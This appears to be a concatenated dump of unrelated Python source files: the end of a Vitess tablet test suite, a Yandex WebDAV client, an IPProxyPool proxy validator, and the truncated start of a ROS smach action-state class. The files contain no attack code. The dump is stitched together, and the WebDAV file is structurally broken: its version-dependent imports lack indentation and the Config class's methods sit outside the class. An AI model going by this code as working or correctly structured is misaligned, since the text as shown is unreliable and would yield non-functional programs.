    # let's kill the vtaction process with a regular SIGTERM
    os.kill(pid, signal.SIGTERM)
    # check the vtctl command got the right remote error back
    out, err = utils.run_vtctl(['WaitForAction', action_path], trap_output=True,
                               mode=utils.VTCTL_VTCTL, raise_on_error=False)
    if "vtaction interrupted by signal" not in err:
        self.fail("cannot find expected output in error: " + err)
    logging.debug("vtaction was interrupted correctly:\n" + err)
    tablet_62344.kill_vttablet()
# test_vtaction_dies_hard makes sure that the recovery code works
# properly when action dies hard (with a crash for instance)
def test_vtaction_dies_hard(self):
    """SIGKILL a running vtaction, then verify the next action still runs."""
    utils.run_vtctl(['CreateKeyspace', 'test_keyspace'])
    # create the database so vttablets start, as it is serving
    tablet_62344.create_db('vt_test_keyspace')
    tablet_62344.init_tablet('master', 'test_keyspace', '0', start=True)
    # start a 'vtctl Sleep' command, don't wait for it
    action_path, _ = utils.run_vtctl(['-no-wait', 'Sleep',
                                      tablet_62344.tablet_alias, '60s'],
                                     mode=utils.VTCTL_VTCTL, trap_output=True)
    action_path = action_path.strip()
    # wait for the action to be 'Running', capture its pid
    timeout = 10
    while True:
        an = utils.run_vtctl_json(['ReadTabletAction', action_path])
        if an.get('State', None) == 'Running':
            pid = an['Pid']
            logging.debug("Action is running with pid %u, good", pid)
            break
        timeout = utils.wait_step('sleep action to run', timeout)
    # let's kill it hard, wait until it's gone for good
    os.kill(pid, signal.SIGKILL)
    try:
        os.waitpid(pid, 0)
    except OSError:
        # this means the process doesn't exist any more, we're good
        pass
    # Then let's make sure the next action cleans up properly and can execute.
    # If that doesn't work, this will time out and the test will fail.
    utils.run_vtctl(['Ping', tablet_62344.tablet_alias])
    tablet_62344.kill_vttablet()
def test_restart(self):
    """Starting a second vttablet for the same tablet must kill the first."""
    utils.run_vtctl(['CreateKeyspace', 'test_keyspace'])
    # create the database so vttablets start, as it is serving
    tablet_62344.create_db('vt_test_keyspace')
    tablet_62344.init_tablet('master', 'test_keyspace', '0')
    proc1 = tablet_62344.start_vttablet()
    proc2 = tablet_62344.start_vttablet()
    # poll up to 20s for the first process to exit
    for timeout in xrange(20):
        logging.debug("Sleeping waiting for first process to die")
        time.sleep(1.0)
        proc1.poll()
        if proc1.returncode is not None:
            break
    if proc1.returncode is None:
        self.fail("proc1 still running")
    tablet_62344.kill_vttablet()
def test_scrap_and_reinit(self):
    """Scrap/re-init a replica and verify the replication graph stays correct."""
    utils.run_vtctl(['CreateKeyspace', 'test_keyspace'])
    tablet_62344.create_db('vt_test_keyspace')
    tablet_62044.create_db('vt_test_keyspace')
    # one master one replica
    tablet_62344.init_tablet('master', 'test_keyspace', '0')
    tablet_62044.init_tablet('replica', 'test_keyspace', '0')
    # make sure the replica is in the replication graph
    before_scrap = utils.run_vtctl_json(['GetShardReplication', 'test_nj',
                                         'test_keyspace/0'])
    self.assertEqual(1, len(before_scrap['ReplicationLinks']), 'wrong replication links before: %s' % str(before_scrap))
    # scrap and re-init
    utils.run_vtctl(['ScrapTablet', '-force', tablet_62044.tablet_alias])
    tablet_62044.init_tablet('replica', 'test_keyspace', '0')
    after_scrap = utils.run_vtctl_json(['GetShardReplication', 'test_nj',
                                        'test_keyspace/0'])
    self.assertEqual(1, len(after_scrap['ReplicationLinks']), 'wrong replication links after: %s' % str(after_scrap))
    # manually add a bogus entry to the replication graph, and check
    # it is removed by ShardReplicationFix
    utils.run_vtctl(['ShardReplicationAdd', 'test_keyspace/0',
                     'test_nj-0000066666', 'test_nj-0000062344'], auto_log=True)
    with_bogus = utils.run_vtctl_json(['GetShardReplication', 'test_nj',
                                       'test_keyspace/0'])
    self.assertEqual(2, len(with_bogus['ReplicationLinks']),
                     'wrong replication links with bogus: %s' % str(with_bogus))
    utils.run_vtctl(['ShardReplicationFix', 'test_nj', 'test_keyspace/0'],
                    auto_log=True)
    after_fix = utils.run_vtctl_json(['GetShardReplication', 'test_nj',
                                      'test_keyspace/0'])
    # BUG FIX: the final assertion previously re-checked the stale
    # `after_scrap` result, so a ShardReplicationFix regression could
    # never fail this test. Check the post-fix snapshot instead.
    self.assertEqual(1, len(after_fix['ReplicationLinks']),
                     'wrong replication links after fix: %s' % str(after_fix))
def test_health_check(self):
    """Health reporting: spare->replica promotion, lag detection, recovery, lameduck."""
    utils.run_vtctl(['CreateKeyspace', 'test_keyspace'])
    # one master, one replica that starts in spare
    tablet_62344.init_tablet('master', 'test_keyspace', '0')
    tablet_62044.init_tablet('spare', 'test_keyspace', '0')
    for t in tablet_62344, tablet_62044:
        t.create_db('vt_test_keyspace')
    tablet_62344.start_vttablet(wait_for_state=None, target_tablet_type='replica')
    tablet_62044.start_vttablet(wait_for_state=None, target_tablet_type='replica', lameduck_period='5s')
    tablet_62344.wait_for_vttablet_state('SERVING')
    tablet_62044.wait_for_vttablet_state('NOT_SERVING')
    utils.run_vtctl(['ReparentShard', '-force', 'test_keyspace/0',
                     tablet_62344.tablet_alias])
    # make sure the 'spare' slave goes to 'replica'
    timeout = 10
    while True:
        ti = utils.run_vtctl_json(['GetTablet', tablet_62044.tablet_alias])
        if ti['Type'] == "replica":
            logging.debug("Slave tablet went to replica, good")
            break
        timeout = utils.wait_step('slave tablet going to replica', timeout)
    # make sure the master is still master
    ti = utils.run_vtctl_json(['GetTablet', tablet_62344.tablet_alias])
    self.assertEqual(ti['Type'], 'master', "unexpected master type: %s" % ti['Type'])
    # stop replication on the slave, see it trigger the slave going
    # slightly unhealthy
    tablet_62044.mquery('', 'stop slave')
    timeout = 10
    while True:
        ti = utils.run_vtctl_json(['GetTablet', tablet_62044.tablet_alias])
        if 'Health' in ti and ti['Health']:
            if 'replication_lag' in ti['Health']:
                if ti['Health']['replication_lag'] == 'high':
                    logging.debug("Slave tablet replication_lag went to high, good")
                    break
        timeout = utils.wait_step('slave has high replication lag', timeout)
    # make sure the serving graph was updated
    ep = utils.run_vtctl_json(['GetEndPoints', 'test_nj', 'test_keyspace/0', 'replica'])
    if not ep['entries'][0]['health']:
        self.fail('Replication lag parameter not propagated to serving graph: %s' % str(ep))
    self.assertEqual(ep['entries'][0]['health']['replication_lag'], 'high', 'Replication lag parameter not propagated to serving graph: %s' % str(ep))
    # make sure status web page is unhappy
    self.assertIn('>unhappy</span></div>', tablet_62044.get_status())
    # make sure the vars is updated
    v = utils.get_vars(tablet_62044.port)
    self.assertEqual(v['LastHealthMapCount'], 1)
    # then restart replication, make sure we go back to healthy
    tablet_62044.mquery('', 'start slave')
    timeout = 10
    while True:
        ti = utils.run_vtctl_json(['GetTablet', tablet_62044.tablet_alias])
        if 'Health' in ti and ti['Health']:
            if 'replication_lag' in ti['Health']:
                if ti['Health']['replication_lag'] == 'high':
                    timeout = utils.wait_step('slave has no replication lag', timeout)
                    continue
        logging.debug("Slave tablet replication_lag is gone, good")
        break
    # make sure status web page is healthy
    self.assertIn('>healthy</span></div>', tablet_62044.get_status())
    # make sure the vars is updated
    v = utils.get_vars(tablet_62044.port)
    self.assertEqual(v['LastHealthMapCount'], 0)
    # kill the tablets
    tablet.kill_tablets([tablet_62344, tablet_62044])
    # the replica was in lameduck for 5 seconds, should have been enough
    # to reset its state to spare
    ti = utils.run_vtctl_json(['GetTablet', tablet_62044.tablet_alias])
    self.assertEqual(ti['Type'], 'spare', "tablet didn't go to spare while in lameduck mode: %s" % str(ti))
def test_fallback_policy(self):
    """An unknown -security_policy must fall back to denying /queryz access."""
    tablet_62344.create_db('vt_test_keyspace')
    tablet_62344.init_tablet('master', 'test_keyspace', '0')
    # "bogus" cannot be resolved to a real policy, forcing the fallback path
    # (removed the unused `proc1 =` binding the original kept here)
    tablet_62344.start_vttablet(security_policy="bogus")
    f = urllib.urlopen('http://localhost:%u/queryz' % int(tablet_62344.port))
    try:
        response = f.read()
    finally:
        # close even if read() raises, so the socket is not leaked
        f.close()
    self.assertIn('not allowed', response)
    tablet_62344.kill_vttablet()
if __name__ == '__main__':
    # flag parsing and unittest invocation are delegated to the test utils
    utils.main()
|
yandexwebdav.py | #!/usr/bin/python
# coding=utf-8
import os
import sys
import threading
import logging
import base64
import xml.dom.minidom
from six.moves import queue
from six.moves import http_client
from six import u, b, PY3
if PY3:
from urllib.parse import unquote, quote
else:
from urllib import unquote, quote
logger = logging.getLogger("yandexwebdav.py")
TRYINGS = 3
def _encode_utf8(txt):
    """Encode *txt* to UTF-8 bytes on Python 2; return it unchanged on Python 3."""
    if not PY3:
        if type(txt) == unicode:
            return txt.encode("utf-8")
    return txt
def _decode_utf8(txt):
    """Decode *txt* from UTF-8 bytes; Python 3 str passes through unchanged."""
    if PY3:
        if type(txt) is str:
            return txt
    return txt.decode("utf-8")
def _(path):
    """
    Normalize path to unicode
    :param path: path
    :return: normalize path
    >>> _(None)
    u''
    >>> _(u("test1"))
    u'test1'
    >>> _("test2")
    u'test2'
    """
    if path is None:
        return u("")
    if not PY3:
        if type(path) == unicode:
            return path
    try:
        return _decode_utf8(path)
    except UnicodeDecodeError:
        # bytes that are not valid UTF-8: hand them back unchanged
        pass
    return path
def remote(href):
    """
    Normalize remote href
    :param href: remote path
    :return: normalize href
    >>> remote("/test/hello.txt")
    u'/test/hello.txt'
    >>> remote("test/hello.txt")
    u'/test/hello.txt'
    >>> remote("test\hello.txt")
    u'/test/hello.txt'
    >>> remote(None)
    u'/'
    """
    href = _(href)
    # anchor at the WebDAV root; join keeps an already-absolute href as-is
    href = os.path.join(u("/"), href)
    if os.sep == "\\":
        # on Windows, convert local-style separators to URL separators
        href = href.replace("\\", "/")
    return href
class RemoteObject(object):
    """One <response> entry of a WebDAV PROPFIND result (a remote file or folder)."""

    def __init__(self, dom, config, root):
        # dom: minidom node for one DAV:response; config: owning Config;
        # root: href of the folder that was listed.
        self._dom = dom
        self._config = config
        self.root = root
        href = self._getEl("href")
        href = _encode_utf8(href)
        # hrefs arrive percent-encoded; store the decoded form
        self.href = _decode_utf8(unquote(href))
        self.length = self._getEl("getcontentlength")
        self.name = self._getEl("displayname")
        self.creationdate = self._getEl("creationdate")

    def _getEl(self, name):
        # Text of the first matching DAV: element, or "" when absent.
        els = self._dom.getElementsByTagNameNS("DAV:", name)
        return els[0].firstChild.nodeValue if len(els) > 0 else ""

    def isFolder(self):
        # A DAV:collection child marks a folder entry.
        els = self._dom.getElementsByTagNameNS("DAV:", "collection")
        return len(els) > 0

    def download(self):
        return self._config.download(self.href)

    def downloadTo(self, path):
        return self._config.downloadTo(self.href, path)

    def delete(self):
        return self._config.delete(self.href)

    def list(self):
        # Skip the entry describing the listed folder itself to avoid recursion.
        if self.isFolder() and self.href != self.root:
            return self._config.list(os.path.join(self.root, self.href))
        return []

    def __str__(self):
        return self.href

    def __unicode__(self):
        return self.href
# Shared job queue of (name, func, args) tuples consumed by worker threads.
qWork = queue.Queue()


def __call():
    """Worker loop: execute (name, func, args) jobs from qWork forever.

    Runs in the daemon threads started by apply_async(). A failing job is
    reported and the worker keeps going.
    """
    while True:
        name, func, args = qWork.get()
        try:
            func(*args)
        except Exception:
            e = sys.exc_info()[1]
            print("Exception: {0} {1}".format(name, e))
        finally:
            # BUG FIX: the original only called task_done() on success, so a
            # single failing job made qWork.join() (used by Config.sync)
            # block forever. task_done() must be called exactly once per get().
            # (The original's `except queue.Empty` was dead code: a blocking
            # get() never raises Empty.)
            qWork.task_done()
# Worker threads, created lazily on the first apply_async() call.
threadsContainer = []


def apply_async(name, func, params_list, limit=5):
    """Queue one *func* call per entry of *params_list* on the worker pool.

    :param name: label used when reporting job failures
    :param func: callable executed by a worker thread
    :param params_list: iterable of argument tuples/lists (or single args)
    :param limit: pool size used when the pool is first created
    """
    for params in params_list:
        if type(params) is list or type(params) is tuple:
            item = (name, func, params)
        else:
            item = (name, func, [params, ])
        # put_nowait returns None; the original bound it to an unused `res`
        qWork.put_nowait(item)
    if len(threadsContainer) > 0:
        # pool already started by an earlier call
        return
    for i in range(limit):
        t = threading.Thread(target=__call)
        t.daemon = True
        threadsContainer.append(t)
    for th in threadsContainer:
        th.start()
class ConnectionException(Exception):
    """Raised when the server answers with a non-success HTTP status."""

    def __init__(self, code, msg=""):
        # BUG FIX: the original wrapped the format string in `_()`, which in
        # this module is the *path normalizer*, not gettext; the message text
        # itself is unchanged.
        strError = "Not Authorization status code: {0}\n{1}".format(code, msg)
        # keep the offending status code for programmatic inspection
        self.code = code
        super(ConnectionException, self).__init__(strError)
def checkResponse(response, msg=""):
    """Raise ConnectionException unless *response* carries an accepted status."""
    accepted = (200, 201, 207)  # OK, Created, WebDAV Multi-Status
    if response.status in accepted:
        return
    raise ConnectionException(response.status, msg)
class Config(object):
    """Account settings plus the WebDAV operations for one yandex.ru account."""

    def __init__(self, opts):
        """
        Constructor
        :param opts: dictionary of property (user, password, host, limit, ...)
        :return: self
        """
        self.user = _encode_utf8(opts.get("user", ""))
        self.password = _encode_utf8(opts.get("password", ""))
        self.host = _encode_utf8(opts.get("host", "webdav.yandex.ru"))
        self.options = opts
        # maximum number of concurrent worker threads used by sync()
        self.limit = opts.get("limit", 4)
def getHeaders(self):
    """
    Get common headers
    :return: dict with Depth, Basic Authorization and Accept headers
    """
    # NOTE(review): base64.encodestring is deprecated (removed in Python 3.9);
    # presumably kept here for Python 2 compatibility via six -- confirm.
    basicauth = base64.encodestring(b(self.user + ':' + self.password)).strip()
    return {
        "Depth": "1",
        "Authorization": 'Basic ' + _decode_utf8(basicauth),
        "Accept": "*/*"
    }
def getConnection(self):
    """
    Get connection
    :return: connection http_client.HTTPSConnection
    """
    # a fresh HTTPS connection per request, to the host set in __init__
    return http_client.HTTPSConnection(self.host)
def list(self, href):
    """
    list of files and directories at remote server
    :param href: remote folder
    :return: list(folders, files) and list(None,None) if folder doesn't exist
    """
    # Retried up to TRYINGS times: transient errors are logged and retried,
    # ConnectionException (auth/status failure) propagates immediately.
    for iTry in range(TRYINGS):
        logger.info(u("list(%s): %s") % (iTry, href))
        folders = None
        files = None
        try:
            href = os.path.join(u("/"), _(href))
            conn = self.getConnection()
            conn.request("PROPFIND", _encode_utf8(href), u(""), self.getHeaders())
            response = conn.getresponse()
            checkResponse(response)
            data = response.read()
            # the server reports these conditions in the body, not the status
            if data == b('list: folder was not found'):
                return folders, files
            elif data == b('You are not authorized to see this!'):
                return folders, files
            else:
                try:
                    dom = xml.dom.minidom.parseString(data)
                    responces = dom.getElementsByTagNameNS("DAV:", "response")
                    folders = {}
                    files = {}
                    for dom in responces:
                        response = RemoteObject(dom, self, href)
                        # skip the entry describing the listed folder itself
                        if response.href != href:
                            if response.isFolder():
                                folders[response.href] = response
                            else:
                                files[response.href] = response
                except xml.parsers.expat.ExpatError:
                    e = sys.exc_info()[1]
                    logger.exception(e)
                return folders, files
        except ConnectionException:
            raise
        except Exception:
            e = sys.exc_info()[1]
            logger.exception(e)
    return folders, files
def sync(self, localpath, href, exclude=None, block=True):
    """
    Sync local and remote folders
    :param localpath: local folder
    :param href: remote folder
    :param exclude: filter folder which need to exlude
    :param block: when True, wait for all queued worker jobs to finish
    :return: respose
    """
    logger.info(u("sync: %s %s") % (localpath, href))
    try:
        localpath = _(localpath)
        href = remote(href)
        # only the top level of localpath; subfolders recurse via apply_async
        localRoot, localFolders, localFiles = next(os.walk(localpath))
        remoteFolders, remoteFiles = self.list(href)
        if remoteFiles is None or remoteFolders is None:
            # remote folder missing: create it and treat it as empty
            remoteFiles = {}
            remoteFolders = {}
            self.mkdir(href)

        def norm(folder):
            # remote folder keys carry a trailing "/"
            path = os.path.join(href, _(folder))
            if path[len(path) - 1] != os.path.sep:
                path += u("/")
            return path

        foldersToCreate = filter(
            lambda folderPath: folderPath not in remoteFolders,
            map(norm, localFolders)
        )
        apply_async("mkdir", lambda path: self.mkdir(path), foldersToCreate, self.limit)
        filesToSync = filter(
            lambda lFile: os.path.join(href, _(lFile)) not in remoteFiles,
            localFiles
        )
        fileArgs = [(os.path.join(localpath, f), os.path.join(href, f))
                    for f in filesToSync]
        apply_async("upload", lambda s, t: self.upload(s, t), fileArgs, self.limit)
        for folder in localFolders:
            localFolderPath = os.path.join(localpath, folder)
            remoteFolderPath = os.path.join(href, folder)
            if exclude:
                # exclude callback returns truthy when the folder SHOULD be synced
                bSync = exclude(localFolderPath, remoteFolderPath)
            else:
                bSync = True
            if bSync:
                # recurse in a worker; block=False so workers never join qWork
                apply_async(
                    "sync",
                    lambda localpath, href: self.sync(localpath, href, exclude, False),
                    [(localFolderPath, remoteFolderPath), ]
                )
    except ConnectionException:
        raise
    except Exception:
        e = sys.exc_info()[1]
        logger.exception(e)
    if block:
        qWork.join()
def mkdir(self, href):
    """
    create remote folder
    :param href: remote path
    :return: response
    """
    for iTry in range(TRYINGS):
        logger.info(u("mkdir(%s): %s") % (iTry, href))
        try:
            href = remote(href)
            con = self.getConnection()
            con.request("MKCOL", _encode_utf8(href), "", self.getHeaders())
            response = con.getresponse()
            checkResponse(response)
            return response.read()
        except ConnectionException:
            raise
        except Exception:
            # transient failure: log and retry; returns None after TRYINGS tries
            e = sys.exc_info()[1]
            logger.exception(e)
def download(self, href):
    """
    Download file and return response
    :param href: remote path
    :return: file responce; b"" when the resource does not exist
    """
    for iTry in range(TRYINGS):
        try:
            logger.info(u("download(%s): %s") % (iTry, href))
            href = remote(href)
            conn = self.getConnection()
            conn.request("GET", _encode_utf8(href), "", self.getHeaders())
            response = conn.getresponse()
            checkResponse(response, "href={0}".format(href))
            data = response.read()
            # the server reports a missing resource in the body, not the status
            if data == b('resource not found'):
                return b("")
            else:
                return data
        except ConnectionException:
            raise
        except Exception:
            # transient failure: log and retry; returns None after TRYINGS tries
            e = sys.exc_info()[1]
            logger.exception(e)
def downloadTo(self, href, localpath):
    """
    Download file to localstorage
    :param href: remote path
    :param localpath: local path
    :return: True on success, False when the resource does not exist,
             None after TRYINGS failed attempts
    """
    for iTry in range(TRYINGS):
        logger.info(u("downloadTo(%s): %s %s") % (iTry, href, localpath))
        try:
            href = remote(href)
            localpath = _(localpath)
            conn = self.getConnection()
            conn.request("GET", _encode_utf8(href), "", self.getHeaders())
            response = conn.getresponse()
            checkResponse(response)
            f = None
            try:
                while True:
                    # BUG FIX: stream and store raw bytes. The original
                    # decoded each 1024-byte chunk as UTF-8 and wrote in text
                    # mode, which corrupted binary files and raised
                    # UnicodeDecodeError whenever a multi-byte character
                    # straddled a chunk boundary.
                    data = response.read(1024)
                    if not data:
                        break
                    if data == b('resource not found'):
                        return False
                    if not f:
                        # open lazily so an error body never creates the file
                        f = open(localpath, "wb")
                    f.write(data)
            finally:
                if f:
                    f.close()
            return True
        except ConnectionException:
            raise
        except Exception:
            # transient failure: log and retry
            e = sys.exc_info()[1]
            logger.exception(e)
def delete(self, href):
    """
    Delete file from remote server
    :param href: remote path
    :return: response
    """
    for iTry in range(TRYINGS):
        logger.info(u("delete(%s): %s") % (iTry, href))
        try:
            href = remote(href)
            conn = self.getConnection()
            conn.request("DELETE", _encode_utf8(href), "", self.getHeaders())
            response = conn.getresponse()
            checkResponse(response)
            return response.read()
        except ConnectionException:
            raise
        except Exception:
            # transient failure: log and retry; returns None after TRYINGS tries
            e = sys.exc_info()[1]
            logger.exception(e)
def write(self, f, href, length=None):
    """
    PUT the contents of a file-like object to a remote path.

    :param f: file-like object supplying the request body
    :param href: remote path
    :param length: optional value for the Content-Length header
    :return: raw response body, or None on a non-connection error
             (ConnectionException is re-raised).
    """
    logger.info(u("write: %s") % href)
    href = remote(href)
    href = os.path.join(u("/"), href)
    try:
        headers = self.getHeaders()
        headers["Content-Type"] = "application/binary"
        # Ask the server to acknowledge before we stream the body.
        headers["Expect"] = "100-continue"
        if length:
            headers["Content-Length"] = length
        connection = self.getConnection()
        connection.request("PUT", quote(_encode_utf8(href)), f, headers)
        resp = connection.getresponse()
        checkResponse(resp)
        return resp.read()
    except ConnectionException:
        raise
    except Exception:
        logger.exception(sys.exc_info()[1])
def upload(self, localpath, href):
    """
    Upload a local file to the remote server, retrying on transient errors.

    :param localpath: local source path
    :param href: remote destination path
    :return: response body from write(), None if the local file is missing
             or every attempt failed (ConnectionException is re-raised).
    """
    localpath = _(localpath)
    href = remote(href)
    if not os.path.exists(localpath):
        logger.info(u("ERROR: localfile: %s not found") % localpath)
        return
    if os.path.islink(localpath):
        # Upload the link target rather than the symlink itself.
        return self.upload(os.path.abspath(os.path.realpath(localpath)), href)
    # Retry the upload a few times before giving up.
    for iTry in range(TRYINGS):
        try:
            logger.info(u("upload: %s %s") % (localpath, href))
            length = os.path.getsize(localpath)
            # Open in binary mode on both Python 2 and 3. The previous code
            # opened in text mode (latin-1 on PY3) and relied on http.client
            # re-encoding each str chunk back to the original bytes; "rb"
            # sends the identical payload without that decode/encode
            # round-trip, and also avoids newline translation that PY2's
            # text mode performs on Windows (which corrupted binary files).
            with open(_encode_utf8(localpath), "rb") as f:
                return self.write(f, href, length=length)
        except ConnectionException:
            raise
        except Exception:
            e = sys.exc_info()[1]
            logger.exception(e)
# This module is library code; running it directly does nothing.
if __name__ == "__main__":
    pass
|
Validator.py | from IPProxyPool import config
from gevent import monkey
monkey.patch_all()
import time, requests, json, chardet, os, sys, gevent, psutil
from multiprocessing import Process, Queue
from IPProxyPool.util.exception import Test_URL_Fail
from IPProxyPool.db.DataStore import sqlhelper
def detect_from_db(myip, proxy, proxies_set):
    """Re-validate a stored proxy row and update the database accordingly.

    :param myip: this machine's public IP (used to classify anonymity)
    :param proxy: sequence of (ip, port, score)
    :param proxies_set: set receiving "ip:port" strings of proxies to keep

    A working proxy is kept. A failing proxy loses one score point and is
    still kept until its score drops below 1, at which point its row is
    deleted from the database.
    """
    ip, port, score = proxy[0], proxy[1], proxy[2]
    if detect_proxy(myip, {'ip': ip, 'port': port}):
        proxies_set.add('%s:%s' % (ip, port))
    elif score < 1:
        sqlhelper.delete({'ip': ip, 'port': port})
    else:
        sqlhelper.update({'ip': ip, 'port': port}, {'score': score - 1})
        proxies_set.add('%s:%s' % (ip, port))
def validator(queue1, queue2, myip):
    """Supervisor loop: batch raw proxies from queue1 into child processes.

    Pulls candidate proxies from queue1, groups them into batches of
    MAX_CHECK_CONCURRENT_PER_PROCESS, and spawns a process_start() child per
    batch (capped at MAX_CHECK_PROCESS live children). Children push their
    PID onto cntl_q when done so they can be reaped here. Validated proxies
    are emitted by the children onto queue2. This function never returns.
    """
    tasklist = []
    proc_pool = {}  # all live child processes, keyed by PID
    cntl_q = Queue()  # control queue: children report their PID here on exit
    while True:
        if not cntl_q.empty():
            # Reap children that reported completion.
            try:
                pid = cntl_q.get()
                proc = proc_pool.pop(pid)
                # Kill via psutil in case the Process object alone
                # is not enough to terminate it.
                proc_ps = psutil.Process(pid)
                proc_ps.kill()
                proc_ps.wait()
            except Exception as e:
                # Best-effort reaping: the process may already be gone.
                pass
                # print(e)
                # print(" we are unable to kill pid:%s" % (pid))
        try:
            # proxy_dict = {'source':'crawl','data':proxy}
            if len(proc_pool) >= config.MAX_CHECK_PROCESS:
                # At capacity: back off before trying again.
                time.sleep(config.CHECK_WATI_TIME)
                continue
            # NOTE(review): blocking get() — the except branch below only
            # fires on queue errors, so a final partial batch may sit here
            # indefinitely until more input arrives. Confirm intended.
            proxy = queue1.get()
            tasklist.append(proxy)
            if len(tasklist) >= config.MAX_CHECK_CONCURRENT_PER_PROCESS:
                p = Process(target=process_start, args=(tasklist, myip, queue2, cntl_q))
                p.start()
                proc_pool[p.pid] = p
                tasklist = []
        except Exception as e:
            # On any failure, flush whatever partial batch we accumulated.
            if len(tasklist) > 0:
                p = Process(target=process_start, args=(tasklist, myip, queue2, cntl_q))
                p.start()
                proc_pool[p.pid] = p
                tasklist = []
def process_start(tasks, myip, queue2, cntl):
    """Validate a batch of proxies concurrently with gevent greenlets.

    Runs inside a child process. When all checks finish, this process's PID
    is pushed onto *cntl* so the parent supervisor can reap it.
    """
    greenlets = [gevent.spawn(detect_proxy, myip, task, queue2) for task in tasks]
    gevent.joinall(greenlets)
    cntl.put(os.getpid())  # announce completion to the parent
def detect_proxy(selfip, proxy, queue2=None):
    """Check one proxy and annotate it with protocol/types/speed.

    :param selfip: this machine's public IP
    :param proxy: dict with at least 'ip' and 'port' keys; on success it is
        mutated in place with 'protocol', 'types' and 'speed'
    :param queue2: optional queue; the result (dict or None) is pushed to it
    :return: the annotated proxy dict, or None if the check failed
    """
    ip = proxy['ip']
    port = proxy['port']
    proxies = {"http": "http://%s:%s" % (ip, port), "https": "http://%s:%s" % (ip, port)}
    # The actual checker is chosen at runtime by name from config
    # (e.g. checkProxy or baidu_check) and looked up in this module.
    protocol, types, speed = getattr(sys.modules[__name__],config.CHECK_PROXY['function'])(selfip, proxies)#checkProxy(selfip, proxies)
    if protocol >= 0:
        proxy['protocol'] = protocol
        proxy['types'] = types
        proxy['speed'] = speed
    else:
        proxy = None
    if queue2:
        queue2.put(proxy)
    return proxy
def checkProxy(selfip, proxies):
    """Probe a proxy over HTTP and HTTPS and classify it.

    :return: (protocol, types, speed) where protocol is 2 when both HTTP and
        HTTPS work, 0 for HTTP only, 1 for HTTPS only, -1 when neither works;
        types/speed come from the HTTP probe when available, otherwise from
        the HTTPS probe, otherwise -1.
    """
    http_ok, http_types, http_speed = _checkHttpProxy(selfip, proxies)
    https_ok, https_types, https_speed = _checkHttpProxy(selfip, proxies, False)
    if http_ok and https_ok:
        return 2, http_types, http_speed
    if http_ok:
        return 0, http_types, http_speed
    if https_ok:
        return 1, https_types, https_speed
    return -1, -1, -1
def _checkHttpProxy(selfip, proxies, isHttp=True):
    """Probe a proxy against a header-echo test URL and classify anonymity.

    :param selfip: this machine's public IP (unused here; kept for the
        common checker signature)
    :param proxies: requests-style proxies dict
    :param isHttp: probe the HTTP test URL when True, the HTTPS one otherwise
    :return: (ok, types, speed) — ok is True on HTTP 2xx; types is 2 when the
        echoed origin contains multiple IPs (real IP leaked — presumably
        "transparent"), 1 when a Proxy-Connection header is present
        (presumably "anonymous"), 0 otherwise (presumably "elite");
        types/speed are -1 on failure. TODO confirm the type labels against
        the project config docs.
    """
    types = -1
    speed = -1
    if isHttp:
        test_url = config.TEST_HTTP_HEADER
    else:
        test_url = config.TEST_HTTPS_HEADER
    try:
        start = time.time()
        r = requests.get(url=test_url, headers=config.get_header(), timeout=config.TIMEOUT, proxies=proxies)
        if r.ok:
            # Round the elapsed time to two decimal places.
            speed = round(time.time()-start, 2)
            # The test endpoint echoes the request headers and origin IP
            # as JSON (httpbin-style response).
            content = json.loads(r.text)
            headers = content['headers']
            ip = content['origin']
            proxy_connection = headers.get('Proxy-Connection', None)
            if ',' in ip:
                types = 2
            elif proxy_connection:
                types = 1
            else:
                types = 0
            return True, types, speed
        else:
            return False, types, speed
    except Exception as e:
        print(e)
        return False, types, speed
def baidu_check(selfip, proxies):
    """Coarse proxy check: fetch the Baidu homepage through the proxy.

    Unlike checkProxy(), this only distinguishes "works at all" from
    "broken": a successful fetch yields (0, 0, elapsed-seconds), any
    failure yields (-1, -1, -1).

    :param selfip: unused; kept for the common checker signature
    :param proxies: requests-style proxies dict
    :return: (protocol, types, speed)
    """
    try:
        started = time.time()
        r = requests.get(url='https://www.baidu.com', headers=config.get_header(), timeout=config.TIMEOUT, proxies=proxies)
        # Let chardet pick the response encoding before .ok forces a decode path.
        r.encoding = chardet.detect(r.content)['encoding']
        if r.ok:
            return 0, 0, round(time.time() - started, 2)
        return -1, -1, -1
    except Exception:
        return -1, -1, -1
def getMyIP():
    """Return this machine's public IP as reported by the config.TEST_IP service.

    :raises Test_URL_Fail: if the request or the JSON parsing fails.
    """
    try:
        response = requests.get(url=config.TEST_IP, headers=config.get_header(), timeout=config.TIMEOUT)
        return json.loads(response.text)['origin']
    except Exception:
        raise Test_URL_Fail
# Ad-hoc manual check: probe a single hard-coded proxy over HTTPS when the
# module is run directly.
if __name__ == '__main__':
    ip = '112.87.70.79'
    port = 9999
    # proxies = {"http": "http://%s:%s" % (ip, port), "https": "http://%s:%s" % (ip, port)}
    proxies = {"https": "http://%s:%s" % (ip, port)}
    _checkHttpProxy(None, proxies)
simple_action_state.py |
import roslib; roslib.load_manifest('smach_ros')
import rospy
import threading
import traceback
import copy
from actionlib.simple_action_client import SimpleActionClient, GoalStatus
import smach
from smach.state import *
__all__ = ['SimpleActionState']
class SimpleActionState(State):
    """Simple action client state.
    Use this class to represent an actionlib as a state in a state machine.
    """
    # Meta-states for this action
    WAITING_FOR_SERVER = 0
    INACTIVE = 1
    ACTIVE = 2
    PREEMPTING = 3
    COMPLETED = 4
    def __init__(self,
            # Action info
            action_name,
            action_spec,
            # Default goal
            goal = None,
            goal_key = None,
            goal_slots = [],
            goal_cb = None,
            goal_cb_args = [],
            goal_cb_kwargs = {},
            # Result modes
            result_key = None,
            result_slots = [],
            result_cb = None,
            result_cb_args = [],
            result_cb_kwargs = {},
            # Keys
            input_keys = [],
            output_keys = [],
            outcomes = [],
            # Timeouts
            exec_timeout = None,
            preempt_timeout = rospy.Duration(60.0),
            server_wait_timeout = rospy.Duration(60.0),
            # Feedback
            feedback_cb = None,
            feedback_cb_args = [],
            feedback_cb_kwargs = {}
            ):
        """Constructor for SimpleActionState action client wrapper.
        @type action_name: string
        @param action_name: The name of the action as it will be broadcast over ros.
        @type action_spec: actionlib action msg
        @param action_spec: The type of action to which this client will connect.
        @type goal: actionlib goal msg
        @param goal: If the goal for this action does not need to be generated at
        runtime, it can be passed to this state on construction.
        @type goal_key: string
        @param goal_key: Pull the goal message from a key in the userdata.
        This will be done before calling the goal_cb if goal_cb is defined.
        @type goal_slots: list of string
        @param goal_slots: Pull the goal fields (__slots__) from like-named
        keys in userdata. This will be done before calling the goal_cb if
        goal_cb is defined.
        @type goal_cb: callable
        @param goal_cb: If the goal for this action needs to be generated at
        runtime, a callback can be stored which modifies the default goal
        object. The callback is passed two parameters:
